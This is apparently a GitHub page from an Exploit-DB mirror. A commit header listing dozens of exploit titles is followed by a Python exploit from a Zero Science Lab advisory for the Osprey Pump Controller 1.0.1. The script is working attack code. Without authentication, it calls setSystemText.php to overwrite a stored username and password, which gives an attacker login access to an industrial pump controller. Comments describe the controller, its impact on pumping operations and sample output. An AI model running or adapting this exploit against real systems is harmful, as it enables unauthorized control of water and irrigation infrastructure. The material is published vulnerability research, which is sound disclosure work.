d7c9ba572a
50 changes to exploits/shellcodes/ghdb Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI ABUS Security Camera TVIP 20000-21150 - LFI_ RCE and SSH Root Access Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated) Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection Osprey Pump Controller 1.0.1 - (pseudonym) Semi-blind Command Injection Osprey Pump Controller 1.0.1 - (userName) Blind Command Injection Osprey Pump Controller 1.0.1 - Administrator Backdoor Access Osprey Pump Controller 1.0.1 - Authentication Bypass Credentials Modification Osprey Pump Controller 1.0.1 - Cross-Site Request Forgery Osprey Pump Controller 1.0.1 - Predictable Session Token / Session Hijack Osprey Pump Controller 1.0.1 - Unauthenticated File Disclosure Osprey Pump Controller 1.0.1 - Unauthenticated Remote Code Execution Exploit Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE HospitalRun 1.0.0-beta - Local Root Exploit for macOS Adobe Connect 10 - Username Disclosure craftercms 4.x.x - CORS EasyNas 1.1.0 - OS Command Injection Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE) Art Gallery Management System Project in PHP v 1.0 - SQL injection atrocore 1.5.25 User interaction - Unauthenticated File upload - RCE Auto Dealer Management System 1.0 - Broken Access Control Exploit Auto Dealer Management System v1.0 - SQL Injection Auto Dealer Management System v1.0 - SQL Injection in sell_vehicle.php Auto Dealer Management System v1.0 - SQL Injection on manage_user.php Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload Best pos Management System v1.0 - SQL Injection ChurchCRM v4.5.3-121fcc1 - SQL Injection Dompdf 1.2.1 - Remote Code Execution (RCE) Employee Task Management System v1.0 - Broken Authentication Employee Task Management System v1.0 - SQL Injection on (task-details.php?task_id=?) Employee Task Management System v1.0 - SQL Injection on edit-task.php flatnux 2021-03.25 - Remote Code Execution (Authenticated) Intern Record System v1.0 - SQL Injection (Unauthenticated) Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking LDAP Tool Box Self Service Password v1.5.2 - Account takeover Music Gallery Site v1.0 - Broken Access Control Music Gallery Site v1.0 - SQL Injection on music_list.php Music Gallery Site v1.0 - SQL Injection on page Master.php Music Gallery Site v1.0 - SQL Injection on page view_music_details.php POLR URL 2.3.0 - Shortener Admin Takeover Purchase Order Management-1.0 - Local File Inclusion Simple Food Ordering System v1.0 - Cross-Site Scripting (XSS) Simple Task Managing System v1.0 - SQL Injection (Unauthenticated) modoboa 2.0.4 - Admin TakeOver pdfkit v0.8.7.2 - Command Injection FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking Windows 11 10.0.22000 - Backup service Privilege Escalation TitanFTP 2.0.1.2102 - Path traversal to Remote Code Execution (RCE) Unified Remote 3.13.0 - Remote Code Execution (RCE)
149 lines
No EOL
6 KiB
Python
Executable file
149 lines
No EOL
6 KiB
Python
Executable file
#!/usr/bin/env python
|
|
#
|
|
# Exploit Title: Osprey Pump Controller v1.0.1 - Authentication Bypass Credentials Modification
|
|
# Exploit Author: LiquidWorm
|
|
#
|
|
# Vendor: ProPump and Controls, Inc.
|
|
# Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com
|
|
# Affected version: Software Build ID 20211018, Production 10/18/2021
|
|
# Mirage App: MirageAppManager, Release [1.0.1]
|
|
# Mirage Model 1, RetroBoard II
|
|
#
|
|
#
|
|
# Summary: Providing pumping systems and automated controls for
|
|
# golf courses and turf irrigation, municipal water and sewer,
|
|
# biogas, agricultural, and industrial markets. Osprey: door-mounted,
|
|
# irrigation and landscape pump controller.
|
|
#
|
|
# Technology hasn't changed dramatically on pump and electric motors
|
|
# in the last 30 years. Pump station controls are a different story.
|
|
# More than ever before, customers expect the smooth and efficient
|
|
# operation of VFD control. Communications—monitoring, remote control,
|
|
# and interfacing with irrigation computer programs—have become common
|
|
# requirements. Fast and reliable accessibility through cell phones
|
|
# has been a game changer.
|
|
#
|
|
# ProPump & Controls can handle any of your retrofit needs, from upgrading
|
|
# an older relay logic system to a powerful modern PLC controller, to
|
|
# converting your fixed speed or first generation VFD control system to
|
|
# the latest control platform with communications capabilities.
|
|
#
|
|
# We use a variety of solutions, from MCI-Flowtronex and Watertronics
|
|
# package panels to sophisticated SCADA systems capable of controlling
|
|
# and monitoring networks of hundreds of pump stations, valves, tanks,
|
|
# deep wells, or remote flow meters.
|
|
#
|
|
# User friendly system navigation allows quick and easy access to all
|
|
# critical pump station information with no password protection unless
|
|
# requested by the customer. Easy to understand control terminology allows
|
|
# any qualified pump technician the ability to make basic changes without
|
|
# support. Similar control and navigation platform compared to one of the
|
|
# most recognized golf pump station control systems for the last twenty
|
|
# years make it familiar to established golf service groups nationwide.
|
|
# Reliable push button navigation and LCD information screen allows the
|
|
# use of all existing control panel door switches to eliminate the common
|
|
# problems associated with touchscreens.
|
|
#
|
|
# Global system configuration possibilities allow it to be adapted to
|
|
# virtually any PLC or relay logic controlled pump stations being used in
|
|
# the industrial, municipal, agricultural and golf markets that operate
|
|
# variable or fixed speed. On board Wi-Fi and available cellular modem
|
|
# option allows complete remote access.
|
|
#
|
|
# Desc: A vulnerability has been discovered in the web panel of Osprey pump
|
|
# controller that allows an unauthenticated attacker to create an account
|
|
# and bypass authentication, thereby gaining unauthorized access to the
|
|
# system. The vulnerability stems from a lack of proper authentication
|
|
# checks during the account creation process, which allows an attacker
|
|
# to create a user account without providing valid credentials. An attacker
|
|
# who successfully exploits this vulnerability can gain access to the pump
|
|
# controller's web panel, and cause disruption in operation, modify data,
|
|
# change other usernames and passwords, or even shut down the controller
|
|
# entirely.
|
|
#
|
|
# The attacker can leverage their unauthorized access to the
|
|
# system to carry out a variety of malicious activities, including:
|
|
# Modifying pump settings, such as flow rates or pressure levels, causing
|
|
# damage or loss of control, stealing sensitive data, such as system logs
|
|
# or customer information, changing passwords and other user credentials,
|
|
# potentially locking out legitimate users or allowing the attacker to
|
|
# maintain persistent access to the system, disabling or shutting down
|
|
# the controller entirely, potentially causing significant disruption to
|
|
# operations and service delivery.
|
|
#
|
|
# ----------------------------------------------------------------------
|
|
# $ ./accpump.py 192.168.0.25 root rewt
|
|
# [ ok ]
|
|
# [ ok ]
|
|
# Login with 'root:rewt' -> Register Access Menu.
|
|
# ----------------------------------------------------------------------
|
|
#
|
|
# Tested on: Apache/2.4.25 (Raspbian)
|
|
# Raspbian GNU/Linux 9 (stretch)
|
|
# GNU/Linux 4.14.79-v7+ (armv7l)
|
|
# Python 2.7.13 [GCC 6.3.0 20170516]
|
|
# GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git
|
|
# PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)
|
|
#
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
# Macedonian Information Security Research and Development Laboratory
|
|
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
|
|
#
|
|
#
|
|
# Advisory ID: ZSL-2023-5752
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5752.php
|
|
#
|
|
#
|
|
# 05.01.2023
|
|
#
|
|
|
|
import requests
|
|
import sys as s
|
|
if len(s.argv)!=4:
|
|
print("Osprey Pump Controller Bypass Exploit")
|
|
print("Arguments: [host] [username] [password]")
|
|
exit(-3)
|
|
else:
|
|
url=s.argv[1]
|
|
usr=s.argv[2]
|
|
pwd=s.argv[3]
|
|
if not "http" in url:
|
|
url="http://{}".format(url)
|
|
#
|
|
# Data names . Values
|
|
#
|
|
# USERNAME0 . user
|
|
# USERNAME1 .
|
|
# USERNAME2 .
|
|
# USERNAME3 .
|
|
# USERNAME4 .
|
|
# USERPW0 . 1234
|
|
# USERPW1 .
|
|
# USERPW2 .
|
|
# USERPW3 .
|
|
# USERPW4 .
|
|
#
|
|
url+="/"
|
|
url+="setSystemText"
|
|
url+=".php"
|
|
paru={"sysTextValue" :usr,
|
|
"sysTextName" :"USERNAME3",
|
|
"backTargetLinkNumber":75,
|
|
"userName" :"ZSL"}
|
|
parp={"sysTextValue" :pwd,
|
|
"sysTextName" :"USERPW3",
|
|
"backTargetLinkNumber":75,
|
|
"userName" :"WriteExploit"}
|
|
r=requests.get(url,params=paru)
|
|
if 'System String "USERNAME3" set' in r.text:
|
|
print("[ ok ]")
|
|
else:
|
|
print(f"Error: {r.status_code} {r.reason} - {r.text}")
|
|
r=requests.get(url,params=parp)
|
|
if 'System String "USERPW3" set' in r.text:
|
|
print("[ ok ]")
|
|
print(f"Login with '{usr}:{pwd}' ",end="")
|
|
print("-> Register Access Menu.")
|
|
else:
|
|
print(f"Error: {r.status_code} {r.reason} - {r.text}") |